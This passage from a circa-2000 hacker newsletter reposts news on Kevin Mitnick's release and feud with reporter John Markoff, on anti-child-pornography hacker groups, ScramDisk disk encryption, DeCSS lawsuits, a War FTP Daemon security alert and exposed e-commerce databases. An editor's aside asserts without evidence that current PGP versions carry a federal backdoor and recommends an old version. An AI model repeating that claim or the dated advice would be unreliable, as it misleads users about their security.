New York Times' reporter John Markoff covered the latter portion of the two-and-a-half year pursuit of Mitnick, and in a July 4, 1994, article called him "Cyberspace's most wanted." Mitnick blames the hype surrounding his elusive flight from authorities and his subsequent arrest on Markoff's article. In addition, the 36-year old ex-hacker claims that Markoff crossed the line by bringing authorities and computer expert Tsutomu Shimomura together to track him down. Mitnick went as far as to call the article libelous and defamatory.

In a Friday morning interview, Markoff stood by his reporting, saying that the allegations were "really disappointing to me because it suggests that in the past five years, and perhaps in the last 20 years, Kevin has not learned anything. What he might have learned from all his time in prison is that it is wrong to break into other people's computers. I don't think it is anymore complex than that."

Markoff pointed out that Mitnick had been arrested five times in the last 20 years for computer-related crimes. "The problem is, and the reason the judge kept him away from computers, (is that) this is the fifth time that he has been arrested. It's not like they haven't given him chances," said Markoff.
Markoff also denied any ethical breach. "I won't get into the specifics on those three cases," Markoff said. "I want to say that I stand by my story, and to note that it was written while Kevin was a fugitive from four law enforcement agencies, and that's why it was written." In court, Mitnick also claims he didn't get a fair shake. Looking tired and much thinner than five years ago, the bespectacled cybercriminal blamed prosecution for blocking his defense from acting on his behalf. "Their method (in) this case was to manipulate the amount of loss to exaggerate the alleged harm," he said. "I've acknowledged since my arrest in February, 1995, that the actions I took were illegal, and that I committed invasions of privacy. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence." Damages 'grossly inflated' In total, the prosecution estimated damages at $80 million by including the full R&D costs of the applications and source code that Mitnick copied, even though none of the code was ever sold to another company or is known to have been used by a competitor. "Everybody realizes that those (estimates) were greatly inflated," said Jennifer Granick, a San Francisco defense attorney, who represented hacker Kevin Poulsen in litigation following that hacker's release from prison. (Poulsen is a ZDNet News contributor.) The number may sound familiar. That's because David L. Smith, who plead guilty to writing and releasing the Melissa virus in December, similarly admitted to the prosecutor's assessed damages of $80 million. It's no coincidence: Under federal law that is the maximum amount accounted for by sentencing guidelines. In fact, it is usually the major factor in determining the length of jail time. That leads to a skewed pursuit of justice, said Granick. "The criminal courts are here to deal with societal wrongs," she said. 
"It is not their primary purpose to recompense the victims."

"I hope that the Kevin Mitnick case is the last case of the great '80s hacker hysteria," she continued. "I hope that we won't have the same kind of hype in the future so that people can get a fair shake in the media and in court."

The U.S. Attorney's office could not comment by press time.

Kevin Poulsen contributed to this report.

____________________________________________________________________________

The case of the kung fu 'phreak'

Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked.

Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425425,00.html

Since this is *big* news, you can stay here and read the ASCII-version:

The case of the kung fu 'phreak'

Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked.

By Kevin Poulsen, ZDNet News
January 21, 2000 11:59 AM PT

Two days after computer security expert Tsutomu Shimomura suffered the now-legendary Christmas Day 1994 hack-attack that launched his search for Kevin Mitnick, a mysterious message left on his voice mail box added real-world menace to the cyberspace crime.

"Damn you, my technique is the best," said an odd voice in a faux-British accent. "I know sendmail technique, and my style is much better ... Me and my friends, we'll kill you."

Three days later the caller left another message, this time beginning with a kung fu scream and affecting the voice of an actor in a martial arts film: "Your security technique will be defeated. Your technique is no good."

In a third message, on Feb. 4, 1995, the caller chided Shimomura, who he called "grasshopper," for mentioning the messages in a Newsweek article on the intrusion and for putting digitized copies on the Internet. "Don't you know that my kung fu is the best?"
The taunting phone calls were presumed to be from Shimomura's intruder, and they became a fixture in the Shimomura vs. Mitnick manhunt story. Digitized copies can be found on the official Web site for Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It."

The equation of hacking with kung fu fighting has become a cultural touchstone in its own right, and on more than one occasion the "Lone Gunmen" hackers on Fox's "The X-Files" have been heard to mutter, "My kung fu is the best."

The real kung fu 'phreak'

The only problem is, the thinly disguised voice never sounded at all like Kevin Mitnick, and two of the messages came after the hacker had been arrested.

"I heard that this guy named Shimomura had been hacked ... So I just thought, What the hell, I'd leave some voice mails," says 31-year-old Zeke Shif. "I used to watch kung fu movies a lot."

Under the handle "SN," Shif once had a solid reputation in the computer underground as a "phone phreak" (i.e., phone hacker). But he says that, by 1995, his fear of "The Man" had long since scared him straight; he simply succumbed to the temptation to make some prank phone calls.

"I thought I'd be funny," says Shif, who like many hackers from the early 1990s has gone on to work in the computer security trade, for Virginia-based Network Security Technologies Inc.

The matter became less amusing when Shif read the news reports on Feb. 15, 1995. "I found out Mitnick got caught, and they were trying to link that to the voice mail," says Shif, who responded by calling Shimomura again. "I left a pre-emptive message, saying, listen, this has nothing to do with any Mitnick or anything, I'm just making fun of kung fu movies."

And this time, he didn't call him grasshopper.
____________________________________________________________________________

Mitnick Released

Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment.

Read the article online at:
http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2118614,00.html

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick Released

Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment.

By Iolande Bloxsom
January 21, 2000

Convicted hacker Kevin Mitnick was released early this morning from federal prison in Lompoc, California. Possibly the most famous hacker ever, Mitnick was arrested in February of 1995, and has spent almost five years in prison.

In a prepared statement, Mitnick had harsh words for both the media and federal prosecutors, both of whom he blamed for his long incarceration. The media "grossly misreported" his case and created what he called the "villain of the month." He also railed against the media for "defin[ing] what is 'acceptable discussion'."

Mitnick singled out John Markoff, a reporter for The New York Times, accusing him of "libelous and defamatory reporting-- and I use the word reporting in quotes." He charged that Markoff's articles had facts that were untrue, that were unproven, and that Markoff failed to disclose a previous relationship. (Mitnick appeared in Cyberpunk, a book Markoff co-wrote with Katie Hafner in 1995.) Finally, Mitnick claimed that the journalist "is a millionaire" now because of his reporting on the convicted hacker.

In a later interview with ZDTV's Janet Yee, Markoff said he stood by his reporting.

However, Mitnick had equal censure for prosecutors David Schindler and Christopher Painter, who, he claimed "went as far as holding me in solitary confinement," to try to force him to plead guilty. He says, though, that his crime was one of trespass, rather than fraud.
"I never deprived companies of anything... there was never any evidence of fraud."

Mitnick pleaded guilty on March 26, 1999, to seven felonies, including unauthorized intrusion into computers at cellular telephone companies, software manufacturers, ISPs, and universities. He also admitted to illegally downloading proprietary software from some of these companies.

In August, US District Court Judge Marianna Pfaelzer sentenced Mitnick to 46 months in prison and ordered him to pay $4,125 in restitution. She also ordered Mitnick not to touch a computer or cellular phone without written approval from his probation officer.

The sentence, governed by a plea agreement between Mitnick and his prosecutors, ran on top of the 22 months he already received for cell-phone cloning and a probation violation, for a total of 68 months. With credit for his lengthy pretrial custody and some time off for good behavior, Mitnick served just less than five years in prison.

Mitnick is headed back to Los Angeles, where his family lives.

By Iolande Bloxsom
January 21, 2000

____________________________________________________________________________

Mitnick's Digital Divide

/* This is news from two weeks ago, but still a headline */

It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991.

Read the online article at:
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2128328,00.html

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick's Digital Divide

It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991.

By Kevin Poulsen
January 12, 2000

On Friday, January 21, hacker Kevin Mitnick will go free after nearly five years behind bars.
But when he walks out the gates of the Lompoc federal correctional institution in California, he'll be burdened with a crippling handicap: a court order barring him for up to three years from possessing or using computers, "computer-related" equipment, software, and anything that could conceivably give him access to the Internet.

These anti-computer restrictions are even more ridiculous today than when I faced them upon leaving federal custody in June, 1996. In the wired world of 2000, you'd be hard pressed to find a job flipping burgers that didn't require access to a computerized cash register, and three years from now McDonald's applicants will be expected to know a little Java and a smattering of C++.

Since Mitnick's arrest in 1995, the Internet has grown from a hopeful ditty to a deafening orchestral roar rattling the windows of society. The importance of computer access in America has been acknowledged by the White House in separate initiatives to protect technological infrastructure from "cyberterrorists," and to bridge the so-called digital divide between information haves and have-nots.

"We must connect all of our citizens to the Internet," vowed President Clinton last month. He was not referring to Kevin Mitnick.

Mitnick, dubbed the "World's Most Notorious Hacker" by Guinness, pleaded guilty on March 26 to seven felonies, and admitted to cracking computers at cellular telephone companies, software manufacturers, ISPs, and universities, as well as illegally downloading proprietary software. Though he's never been accused of trying to make money from his crimes, he's been in and out of trouble for his nonprofit work since he was a teenager.

So, the theory goes, keeping Mitnick away from computers will deprive a known recidivist of the instruments of crime and set him on the road to leading a good and law-abiding life. I've heard that theory from prosecutors, judges and my (then) probation officer.
They all compare computers to lock picks, narcotics, and guns-- everything but a ubiquitous tool used by a quarter of all Americans and nearly every industry.

Mitnick, we should believe, will be tempted in the next year or so to crack some more computers and download some more software. But when the crucial moment comes for him to commit a felony that could land him in prison for a decade, his fingers will linger indecisively over the keyboard as he realizes, "Wait! I can't use a computer! My probation officer will be pissed!"

The fact is, if Mitnick chooses crime, he won't be deterred by the 11 months in prison that a technical supervised release violation could carry. These conditions only prevent him from making legitimate use of computers.

Mitnick's rehabilitation is up to him. But the system shouldn't throw up obstructions by keeping him away from the mainstream, on the sidelines, and out of the job market. His probation officer will have the power to ease his restrictions, perhaps by allowing him to get a computer job with the informed consent of his employer. That would be a good start.

January 21 will be a happy day for Mitnick, his family, and friends. But getting out of prison after a long stretch carries challenges too. Nobody is served by stranding the hacker on the wrong side of the digital divide.

____________________________________________________________________________

Mitnick: 'I was never a malicious person'

/* This is news from a few months ago, but still a headline */

Hacker files motion accusing government of misconduct -- goes on the record with ZDNN. 'The federal government manipulated the facts.'

Read the online article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2306704,00.html?chkpt=zdnnrla

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick: 'I was never a malicious person'

Hacker files motion accusing government of misconduct -- goes on the record with ZDNN.
'The federal government manipulated the facts.'

By Kevin Poulsen, ZDNet News
July 30, 1999 4:36 PM PT

Kevin Mitnick and his attorneys are asking a federal judge to unseal a court filing that they claim proves the government was guilty of misconduct while building its case against the hacker. The goal, says Mitnick in a rare interview, is to clear his name.

"At the beginning of this case the federal government manipulated the facts to allege losses that were grossly inflated," Mitnick said in a telephone interview Thursday night from the Los Angeles Metropolitan Detention Center. "Hopefully, if the court considers this motion and rules upon its merits, it will clear me publicly of the allegations that I caused these significant losses."

The motion, filed by defense attorney Don Randolph on July 22, is the latest conflict in a case that's remained unusually acrimonious, considering that both sides reached a plea settlement in March. Under the terms of the agreement, Mitnick pleaded guilty to seven felonies and admitted to penetrating computers at such companies as Motorola (NYSE:MOT), Fujitsu and Sun Microsystems, (Nasdaq:SUNW) and downloading proprietary source code. On Aug. 9, he's expected to be sentenced to 46 months in prison, on top of the 22 months he received for cell phone cloning and an earlier supervised release violation.

Mitnick vexed by 'snowball effect'

The only sentencing issue left unresolved is the amount of money Mitnick will owe his victims. Prosecutors are seeking $1.5 million in restitution -- a modest figure compared to the more than $80 million the government quoted to an appeals court last year, when it successfully fought to hold the hacker without bail.

That figure, though no longer promulgated by prosecutors, vexes Mitnick, who sees a "snowball effect" of bad press that began with a 1994 front-page article in the New York Times.
"Because of this assault that was made upon me by John Markoff of the New York Times, then the federal government grossly exaggerating the losses in the case and the damages I caused, I have a desire to clear my name," Mitnick said. "The truth of the matter is that I was never a malicious person. I admit I was mischievous, but not malicious in any sense."

Markoff reported on Mitnick for the New York Times, and went on to co-author Tsutomu Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It," slated as an upcoming movie from Miramax. Markoff's portrayal of Mitnick, and the profit it ultimately earned him, has been the subject of some criticism from Mitnick's supporters, and raised eyebrows with a handful of journalists.

Markoff's most enduring Mitnick anecdote is the story that the hacker cracked NORAD in the early 1980s, a claim that was recycled as recently as last May by another New York Times reporter. "I never even attempted to access their computer, let alone break into it," Mitnick said. "Nor did I do a host of allegations that he says I'm guilty of."

For his part, Markoff says of the NORAD story: "I had a source who was a friend of Kevin's who told me that. I was not the first person to report it, nor the only person to report it."

Government collusion?

The July 22 motion filed by Mitnick's attorney accuses the government of coaching victim companies on how to artificially inflate their losses. The filing is based on documents Randolph subpoenaed from Sun, which show that shortly after Mitnick's February 1995 arrest, the FBI specifically instructed Sun to calculate its losses as "the value of the source code" Mitnick downloaded, and to keep the figure "realistic."

Following the FBI's advice, Sun estimated $80 million in losses based on the amount they paid to license the Unix operating system. Six other companies responded, using software development costs as the primary calculus of loss.
The total bill came to $299,927,389.61, significantly more than the $1.5 million the government says Mitnick inflicted in repair and monitoring costs, and theft of services and the $5 million to $10 million both sides stipulated to for purposes of sentencing.

"At the beginning of this litigation, the government misrepresented to the federal judiciary, the public and the media the losses that occurred in my case," Mitnick said.

To Randolph, it all smacks of collusion. "What comes out from the e-mails that we have, is that the so-called loss figures solicited by the government were research and development costs at best, fantasy at worst," he said. "I would classify it as government manipulation of the evidence."

However, prosecutor David Schindler dismissed Randolph's claims as "silly and preposterous."

"What would be inappropriate is to tell them what dollar amount to arrive at. In terms of the methodology, in terms of what is to be included in loss amounts, that direction is something we often provide because we're aware of what components are allowable under law, and which components are not," he said.

Schindler said development costs are a valid indicator of victim loss, but acknowledges that putting a dollar figure on software can be difficult.

Mitnick claims cover-up

Mitnick and his attorney both say there's more to the story, but they can't talk about it. At Mitnick's last court appearance on July 12, the judge granted a government request that any filings relating to victim loss be sealed from the public.

"As much as the government would like to, you can't take the recipe for ice and file it under seal and have it become confidential," said Mitnick, who, along with his attorney, is challenging the confidentiality of the loss information, and asking for the motion to be unsealed.

Mitnick claims he smells a cover-up.
"The government should not be permitted to bury the truth of the case from the public and the media by seeking and obtaining a protective order to essentially force me to enter a code of silence," he said.

"Our only concern, as it has been from day one, is the protection of the victims of Mitnick's crimes," prosecutor Schindler said. "Why Mitnick and his lawyers want to continue to harass, embarrass and abuse them remains a mystery to us, but it's something that we will continue to oppose vigorously."

Although the software costs are no longer being used against his client, Randolph claimed that by "manipulating the loss figures," the government raises the issue of whether even the more modest $1.5 million calculation is accurate. In the sealed motion, he's seeking an evidentiary hearing to explore the matter, and asking that Mitnick be released on a signature bond pending that hearing.

And if Mitnick winds up owing money anyway? "We're asking for sanctions that the government pay the restitution," Mitnick said, "and that the judge recommend that I be immediately designated to a halfway house for the government's misconduct in this case."

Excerpts of the Sun documents are available on the Free Kevin Web site, maintained by members of a tireless grass-roots movement that's protested the hacker's imprisonment for years.

"I'd like to sincerely thank all my friends and supporters for all the support they've given me over this long period of time," Mitnick said. "I'd like to thank them from my heart."

Kevin Poulsen writes a weekly column for ZDTV's CyberCrime.

@HWA

25.0 Hackers vs Pedophiles, taking on a new approach.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.wired.com/news/print/0,1294,33869,00.html

Hackers' New Tack on Kid Porn
by Lynn Burke

3:00 a.m. 3.Feb.2000 PST

Kent Browne used to spend most of his free time hacking Web sites, erasing hard drives, disabling servers, and knocking folks out of chat rooms.
Like many hackers, he subscribed to the classic Machiavellian argument, that the end justifies the means -- especially when the end was eradicating child pornography on the Internet.

In early December, he and some fellow hackers from New York to Australia started a group called Condemned, and announced their intention to take down child pornographers by any means necessary.

But when Browne, 41, talked to Parry Aftab, an attorney who heads the biggest and most well-known of the anti-child pornography groups -- Cyber Angels -- he had a sudden change of heart.

"She said that the one problem we would have would be with law enforcement. If they knew we were doing illegal stuff, they wouldn't touch us with a 10-foot pole," he said. "Quite frankly, I'm an older guy. I've got two kids. And I don't want to take any chances."

So now he and the rest of Condemned's loosely organized volunteers use specially designed software and good old-fashioned Internet search engines to ferret out the bad stuff and tip off federal agents in the U.S. Customs Service and the FBI.

They're not alone. Natasha Grigori and her volunteer staff at antichildporn.org have also decided to hang up their hacking shoes. At her old organization, Anti Child Porn Militia, Grigori was dedicated to the use of hacking to disable child pornography Web sites.

"We started out very angry, we started out very militant," she said.

But a trip to Def Con in Las Vegas made her change her mind. She started talking with people on the right side of the law, and they told her they supported her cause, but not her means. "You can't stop a felony with a felony," she says now.

But the decision to go "legal" was a difficult one, and she lost most of her volunteer hackers. "Less than a dozen out of 250 stuck with us," she said. "They didn't like the idea. They just thought we could rip and tear."

Browne also says he had a hard time leaving the hacking behind, mostly because he thought it was right. "Which is more illegal?
Having children's pictures on the Internet or hacking down the servers?" he asked. "Morally, I felt I was right."

But morals don't make hacking the right way to eliminate child pornography, according to Aftab, the author of The Parent's Guide to Protecting Your Children in Cyberspace. She says hacking complicates the fight and casts a cloud over groups like hers that work closely with law enforcement. "We need help but we need the right help," she said.

When a site is taken down off the Web, it turns up somewhere else, usually within minutes, she said. And if a server is destroyed, so is the evidence of the person behind it.

"I'd frankly love to able to do all kinds of things to these groups," she said. "You can't let your gut reaction dictate how you react to a disgusting situation."

Getting a gauge on the prevalence of child pornography is difficult. Experts say that most of the images of child pornography are downloaded from newsgroups and traded in secret email clubs. Aftab says true child pornography -- the kind that features children who are very young -- isn't very easy to stumble across on the Web. It takes some digging, she says, for her volunteers to find about 150 new sites each month.

And the reason a group like hers is necessary, she says, is that the technological savvy of the law enforcement is lacking. "When the total technology behind the cops is that one guy uses AOL at home, it's kind of hard to do cyber-forensics," she said.

Grigori said she recently asked a federal agent to come to her office for a meeting to talk about the problem. "The one fed looked at my computer like it was a toaster," she said. "I asked him for his email address, and he said, 'I don't have a computer.'"

The former deputy chief of the Child Exploitation Unit at the Department of Justice, Robert Flores, also says the government isn't doing its part. Flores has had years of experience tracking down child pornographers and pedophiles, both online and off.
But he didn't think he could get his job done as a government employee. "I got to the point where I thought I could do more for families and kids outside of the Justice Department," he said. Flores is now the senior counsel for the Fairfax, Virginia-based National Law Center for Children and Families, a legal resource center for child pornography.

"One of the things the Justice Department has failed to do is say that the law applies on the Internet, that the Internet is not a lawless place," he said.

The laws forbidding child pornography are fairly new. The Supreme Court first ruled in New York v. Ferber in 1982 that child pornography was not protected by the First Amendment. The decision said the government could ban sexual images with serious literary or artistic value in the interest of preventing "the harmful employment of children to make sexually explicit materials for distribution." Two years later, the justices said the government could outlaw not just the distribution but also the possession of child porn.

And it is only in the last few years that the Internet has played a role in laws and statutes governing pornography in general, and child pornography in particular. There is currently a schism within the legal community over the definition of child pornography, and whether it should include computer-generated photographs or computer-enhanced photographs that appear to feature children engaged in sex acts, but actually contain adults.

But while the courts hammer out the issues, some say citizens shouldn't take matters into their own hands. Flores likened the Internet community's attempt to patrol child pornography to picketers in front of a porn store. It's well-intentioned, but it won't change anything.

"My recommendation is that this is not the job for a layman, quite simply," he said. "That's why we pay taxes."

@HWA

26.0 SCRAMDISK (Windows) on the fly encryption for your data.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This isn't new, but it is a VERY good package, several of my colleagues and myself use it for sensitive material on our winboxes. The bonus is, it's free software and will offer sufficient protection of data for most users. This is especially useful for using personal data on your drives at work and hiding it from the boss, it's like having your own (secret) hard disk in your work's machine. The other uses are obvious.

A note about PGP, the latest versions have a BACKDOOR that allows federal agencies access to your data. Use an earlier version of PGP (4.2) if you want to make things harder for federal agents to access your data(!) - Ed

The walls have ears, the net has taps, the government (not just your own) IS listening and scanning your data, so protect your privacy and use PGP for sensitive emails or data transmissions, also use SSH instead of telnet for accessing your shell accounts if possible as many sites are sniffed by hackers daily. - Ed

http://www.securiteam.com/tools/ScramDisk_-_Disk_Encryption_Tool.html

5/1/2000

ScramDisk - Disk Encryption Tool

Details

Scramdisk is a program that allows the creation and use of virtual encrypted drives. Basically, you create a container file on an existing hard drive that is locked with a specific password. This container can then be mounted by the Scramdisk software, which creates a new drive letter to represent the drive. The virtual drive can then only be accessed with the correct pass phrase. Without the correct pass phrase the files on the virtual drive are totally inaccessible - even physically extracting the data will reveal nothing (since the contents are encrypted). Once the pass phrase has been entered correctly and the drive is mounted, the new virtual drive can be used as a normal drive; files can be saved and retrieved and you can safely install applications onto the encrypted drive.

Scramdisk allows virtual disks to be stored in a number of ways:

1. In a container file on a FAT formatted hard disk.
2. On an empty partition.
3. Stored in the low bits of a WAV audio file (this is called steganography).

This last option is especially interesting, since this WAV file can be sent by e-mail or carried on a diskette without attracting too much attention (since by casual hearing the WAV file sounds like the original sound file).

Details:

Scramdisk can create virtual disks with a choice of a number of 'industry standard' encryption algorithms: Triple-DES, IDEA, MISTY1, Blowfish, TEA (either 16 or 32 rounds), and Square. It also includes a proprietary and very fast algorithm 'Summer' which is provided for minimal security applications and for compatibility with older versions of ScramDisk.

Why not use PGP?

PGP is a great program, but it doesn't allow the on-the-fly encryption of a disk's contents. Instead users have to:

1. Decrypt the existing file
2. Work on the data
3. Re-encrypt the data

The problem is, while the file is decrypted it is vulnerable to interception. Scramdisk is complementary to PGP; PGP is excellent for communication security, but is somewhat lacking user friendliness when used for data storage security.

Flaws in the system

Scramdisk is not totally secure (and nor is any security program!). There are a number of ways an attacker may try infiltrating your system:

1. Look for applications that leak data. A very well known word-processor has an interesting bug that leaks parts of the raw contents of the disk when saving an OLE Compound Document.

2. Look for data that isn't deleted securely. Ok, everyone knows that you can undelete a file easily. Did you know that even a file that has been 'wiped' could potentially be recovered by looking at the surface of the disk? Deleted files should be securely wiped using an appropriate program (PGP v6+ contains a secure file wiping program).

3. Look for data that has leaked in other ways. Temporary files and the swap file spring to mind. These both need to be securely erased too.

4. Using Van Eck monitoring. Basically, electrical emissions from the monitor, hard drive and even keyboard can be detected and recorded from a distance away. This may allow an eavesdropper to see what's on your screen or detect your pass phrase as you type it.

5. Brute Forcing. This can happen in a number of ways: they can try brute-forcing your pass phrase (it's important to use a large pass phrase that isn't easily guessed, it helps to use both upper and lower case and numbers as well) or they can try to brute force the algorithm. This is hard work (and will take around 2^127 operations with most of the ciphers included with ScramDisk - DES & Summer are exceptions).

6. Some of the ciphers included may be susceptible to attacks not known about in public. The NSA/GCHQ may have a mechanism faster than brute-force of attacking the algorithms. Scramdisk does not include any weak algorithms in the original distribution (apart from Summer, which is included for backwards compatibility), but who can tell what the Intelligence Agencies can do with Blowfish, IDEA, 3DES et al?

7. Install an amended version of ScramDisk on your computer that secretly stores your pass phrase so that it can be later read by a CIA agent. (Or use a program like SKIn98 to do it!) Far fetched? Possibly, but you should be aware that this kind of attack exists. There is no real way to defend this attack. Check the PGP Signatures of the ScramDisk files against the executables on your computer, but could your copy of PGP have also been amended?

8. Beating you until you spill your pass phrase. Truth drugs also work, apparently.
The software can be downloaded free of charge from:

http://www.scramdisk.clara.net/

@HWA

27.0 HNN:Jan 17: MPAA files more suits over DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.hackernews.com/arch.html?011700

MPAA Files More Suits over DeCSS

contributed by Project Gamma and Macki

In an effort to stop further distribution of the DeCSS program the Motion Picture Association of America has filed lawsuits in federal courts. This follows similar action two weeks ago by the DVD industry association. The MPAA feels that allowing potential illegal copying of DVDs with the DeCSS program would be a violation of US copyright law.

Wired
http://www.wired.com/news/politics/0,1283,33680,00.html

ZD Net
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422893,00.html?chkpt=p1bn

CNN has some interesting quotes from a Warner Home Video spokesperson regarding this whole mess.

CNN - Look about halfway down
http://www.cnn.com/TRANSCRIPTS/0001/11/st.00.html

MPAA has a few interesting things to say as well.

MPAA
http://www.mpaa.org/dvd/content.htm

The folks over at CopyLeft have come up with a T-shirt that has the source code to css_descramble.c printed on it. (Cool, and only $15)

CopyLeft
http://copyleft.net/cgi-bin/copyleft/t039.pl?1&back

** These are really neat, check em out.. - Ed

2600 has posted the story of what has happened to them since their involvement began including them being named as a defendant in the case.

2600.com
http://www.2600.com/news/2000/0115.html

OpenDVD.org is attempting to cover all the developments (and doing a damn good job) in this case including the scheduled injunction for January 18, 2000.

OpenDVD.org
http://opendvd.org/

Articles:

Wired;

Movie Studios File DVD Hack Suit
Reuters

5:20 p.m. 14.Jan.2000 PST

The seven largest US movie studios filed their own lawsuits Friday to prevent several Internet sites from distributing a program that could allow copying of DVD movies.
The lawsuits, filed in federal courts in New York and Connecticut, followed a broader lawsuit filed last month in state court in California by a DVD equipment manufacturers group.

At issue is a program called DeCSS, written by a Norwegian programmer, that allows users to bypass the encryption scheme used on DVDs to prevent unauthorized copying.

But many Internet users and programmers say the software had a simpler, less insidious goal. They said the program was needed to allow people to watch DVD movies on computers running the Linux operating system.

The studios argued that by allowing potential illegal copying, the program violated US copyright law. They asked the courts to prohibit four people from distributing the program on their Web sites.

A spokesman for the Motion Picture Association of America, the studios' lobbying group, said the Web sites involved were dvd-copy.com, krackdown.com and ct2600.com. Dozens of other Web sites have also carried either the program or source code instructions showing how to write the program.

"This is a case of theft," said Jack Valenti, president of the association. "The posting of the de-encryption formula is no different from making and then distributing unauthorized keys to a department store."

The people who posted the code said they had done nothing wrong, insisting that the program was meant to allow viewing of DVD movies under Linux.

"I don't have illegal copies of movies on my site," said Shawn Reimerdes, a computer programmer who maintains the dvd-copy.com Web site. "Just posting these files shouldn't be illegal."

Internet advocacy groups have also opposed the lawsuits, arguing that the posting of computer codes on a Web site is a form of speech protected by the First Amendment.

"This is definitely an infringement on freedom of speech," said Shari Steele, director of legal services at the Electronic Frontier Foundation, a San Francisco-based cyber-rights advocacy group. "What has been done was totally legal.
Posting of the program is legal and there are no pirated movies here."

Chris DiBona, who promotes Linux use for VA Linux Systems, said the industry had refused to help create a program to play DVDs under Linux.

"The whole reason this happened is because the movie industry itself didn't support Linux," DiBona said. "They thought they could keep this a secret. They failed."

The lawsuit relied on the 1998 Millennium Digital Copyright Act, which outlawed the distribution of products designed to crack copyright protection schemes.

"If you can't protect that which you own, then you don't own anything," MPAA's Valenti said.

In the California case, the court last month turned down the industry's request for a temporary restraining order against a much wider array of defendants, many of whom had only provided a link on their Web page to a page containing the actual program. A hearing is scheduled for next week.

Friday's lawsuits were filed by Buena Vista Pictures, a unit of Walt Disney, Metro-Goldwyn-Mayer, Paramount Pictures, a unit of Viacom, Sony's Sony Pictures Entertainment, News Corp.'s Twentieth Century Fox Film, Universal Studios, a unit of Seagram, and Warner Bros., a unit of Time Warner.

-=-

MPAA; 404 - sorry article vanished.

@HWA

28.0 WARftpd Security Alert (Will they EVER fix this software??)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://war.jgaa.com/alert/

SECURITY ALERT - WAR FTP DAEMON ALL VERSIONS

Updated February 4th 2000 13:30 Central European Time.

January 5th 2000, a serious security problem with War FTP Daemon 1.70 was reported by email. Two hours after I read the mail, a security alert was sent to the war-ftpd mailing list, the alt.comp.jgaa newsgroup and the bugtraq mailing list. The alert advised all server operators to take the server off-line until further notice.

Brief overview

War FTP Daemon 1.70:

The bug allows unrestricted access to any file on the local machine also for users that have not logged on.
If an older ODBC driver is installed, the bug also gives users unlimited access to all system commands, with administrator privileges (this is a bug in ODBC that has been fixed in recent versions).

The advice is to take all version 1.70 servers off-line until the server is upgraded!

A bugfix (War FTP Daemon 1.71) was released January 8th 2000 14:40 CET. This version is not completely tested yet. Please report any serious problems to jgaa@jgaa.com.

I will fix bugs in 1.70 over the next few weeks to make 1.70 a little more comfortable to use while we wait for version 3.

War FTP Daemon 1.67b2 and previous versions:

The bug may give privileged users unrestricted access to some files. Users must be logged in, and have at least write or create permissions. Users can not execute commands.

A bugfix was released less than 24 hours after I read the mail that reported the problem.

Buffer overflow problem in 1.6*

February 2nd 2000 there was reported a buffer-overflow problem in 1.6 versions on BUGTRAQ. The problem does not seem to compromise the security, but the server can easily be crashed by remote attackers, after they have logged in.

A fix was released February 3rd 2000, about an hour after I read about the problem.

Bugfixes are released at ftp://ftp.no.jgaa.com and http://war.jgaa.com/alert/files

I'm sorry for any inconveniences caused by these problems.

General news

War FTP Daemon 1.67.

I will make a new full distribution for 1.67. Until this is ready, 1.65 must be installed, and then upgraded.

War FTP Daemon 1.72 service release.

I will make a service release of the 1.70 series in the near future. Some annoying bugs will be fixed, and a command-line utility to add user accounts interactively, or from scripts, will be released. There will also be a simple DLL wrapper interface for easy integration with other software.

War FTP Daemon 3.0.

The development of the next major release continues. 3.0 is currently running under Windows NT and Linux.
The server is however not yet ready for alpha-testing. When all the basic functionality is implemented, and debugged, ftp://ftp.jgaa.com will open up, using version 3.0. This can be expected soon. Early versions for Windows 9x, Windows NT, Debian Linux and FreeBSD will be available for download.

Version 3.0 will be Open Source, under the GNU Public License.

http://download.jgaa.com will open when War FTP Daemon 3.0 moves into early alpha.

Jarle

@HWA

29.0 HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by mack

MSNBC found seven ecommerce sites open for business with easily accessible customer databases. By connecting to weakly secured SQL databases MSNBC was able to access the personal information including credit card numbers of 2500 people. All of the sites have been informed of the problem. (And people act surprised when I tell them that I don't buy anything on the web.)

MSNBC
http://www.msnbc.com/news/357305.asp

Stealing cards easy as Web browsing

By Bob Sullivan
MSNBC

Jan. 14 — Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site.

CREDIT CARD THEFT, a problem long lurking in the background of Internet commerce, leaped to the top of consumers’ minds earlier this month when a computer intruder calling himself Maxus was able to break into CD Universe’s database of user credit cards. There’s still speculation about how he did it.

But perhaps Maxus didn’t have to work so hard.
